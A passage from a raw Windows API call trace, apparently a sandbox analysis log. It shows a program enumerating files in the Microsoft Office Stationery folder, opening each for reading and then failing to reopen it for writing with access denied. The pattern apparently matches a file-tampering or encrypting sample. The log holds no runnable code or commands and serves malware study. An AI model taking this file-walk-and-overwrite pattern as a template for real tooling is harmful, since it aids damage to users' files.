RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e7a0 | out: hHeap=0x20000) returned 1 [0102.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cb90 [0102.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cb90 | out: hHeap=0x20000) returned 1 [0102.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.272] AreFileApisANSI () returned 1 [0102.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm", lpUsedDefaultChar=0x0) returned 74 [0102.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0102.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0102.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0102.272] AreFileApisANSI () returned 1 [0102.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0102.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85300 [0102.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x85300, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 74 [0102.272] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.273] GetFileType (hFile=0x27c) returned 0x1 [0102.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85300 | out: hHeap=0x20000) returned 1 [0102.273] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.273] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.273] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.273] CloseHandle (hObject=0x27c) returned 1 [0102.273] AreFileApisANSI () returned 1 [0102.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0102.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85260 [0102.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d1b8, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm") returned 74 [0102.274] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.274] GetLastError () returned 0x5 [0102.274] GetLastError () returned 0x5 [0102.274] SetLastError (dwErrCode=0x5) [0102.274] GetLastError () returned 0x5 [0102.274] SetLastError (dwErrCode=0x5) [0102.274] GetLastError () returned 0x5 [0102.274] SetLastError (dwErrCode=0x5) [0102.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0102.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0102.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0102.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.274] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.274] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="HandPrints.jpg", cAlternateFileName="")) returned 1 [0102.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0102.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0102.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0102.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0102.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0102.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0102.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0102.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0102.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0102.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0102.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f90 [0102.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f90 | out: hHeap=0x20000) returned 1 [0102.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0102.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6de98 [0102.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0102.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6de98 | out: hHeap=0x20000) returned 1 [0102.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0102.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8c5a8 [0102.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c5a8 | out: hHeap=0x20000) returned 1 [0102.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0102.275] AreFileApisANSI () returned 1 [0102.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg", lpUsedDefaultChar=0x0) returned 73 [0102.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0102.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0102.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.275] AreFileApisANSI () returned 1 [0102.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0102.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85260 [0102.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85260, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 73 [0102.275] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.276] GetFileType (hFile=0x27c) returned 0x1 [0102.276] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85260 | out: hHeap=0x20000) returned 1 [0102.276] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.276] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.276] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.276] CloseHandle (hObject=0x27c) returned 1 [0102.276] AreFileApisANSI () returned 1 [0102.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 73 [0102.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x92) returned 0x85120 [0102.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cea0, cbMultiByte=-1, lpWideCharStr=0x85120, cchWideChar=73 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg") returned 73 [0102.277] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\HandPrints.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.277] GetLastError () returned 0x5 [0102.277] GetLastError () returned 0x5 [0102.277] SetLastError (dwErrCode=0x5) [0102.277] GetLastError () returned 0x5 [0102.277] SetLastError (dwErrCode=0x5) [0102.277] GetLastError () returned 0x5 [0102.277] SetLastError (dwErrCode=0x5) [0102.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85120 | out: hHeap=0x20000) returned 1 [0102.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0102.277] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.277] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.277] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96da6a05, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96da6a05, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96da6a05, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Orange Circles.htm", cAlternateFileName="")) returned 1 [0102.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0102.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0102.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0102.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0102.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0102.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0102.277] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35050 [0102.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35050 | out: hHeap=0x20000) returned 1 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0102.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xbe) returned 0x4ebc8 [0102.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0102.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8d0d0 [0102.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4ebc8 | out: hHeap=0x20000) returned 1 [0102.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d0d0 | out: hHeap=0x20000) returned 1 [0102.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0102.278] AreFileApisANSI () returned 1 [0102.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm", lpUsedDefaultChar=0x0) returned 77 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0102.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.278] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0102.278] AreFileApisANSI () returned 1 [0102.278] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0102.278] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8cae8 [0102.279] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8cae8, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 77 [0102.279] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0102.279] GetFileType (hFile=0x27c) returned 0x1 [0102.279] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8cae8 | out: hHeap=0x20000) returned 1 [0102.279] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0102.279] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0102.279] SetFilePointerEx (in: hFile=0x27c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0102.279] CloseHandle (hObject=0x27c) returned 1 [0102.280] AreFileApisANSI () returned 1 [0102.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 77 [0102.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x9a) returned 0x8d220 [0102.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6d108, cbMultiByte=-1, lpWideCharStr=0x8d220, cchWideChar=77 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm") returned 77 [0102.280] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Orange Circles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\orange circles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0102.280] GetLastError () returned 0x5 [0102.280] GetLastError () returned 0x5 [0102.280] SetLastError (dwErrCode=0x5) [0102.280] GetLastError () returned 0x5 [0102.280] SetLastError (dwErrCode=0x5) [0102.280] GetLastError () returned 0x5 [0102.280] SetLastError (dwErrCode=0x5) [0102.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d220 | out: hHeap=0x20000) returned 1 [0102.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0102.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0102.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.280] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0102.280] FindNextFileW (in: hFindFile=0x78310, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d5a533, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d5a533, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d5a533, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x18ed, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="OrangeCircles.jpg", cAlternateFileName="")) returned 1 [0102.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0102.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0102.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0102.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0102.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0102.280] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0102.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0102.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0102.280] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0102.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35230 [0102.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0102.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35230 | out: hHeap=0x20000) returned 1 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fb0 [0102.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0102.281] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fb0 | out: hHeap=0x20000) returned 1 [0102.281] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4ddc8 [0102.281] RtlAllocateHeap 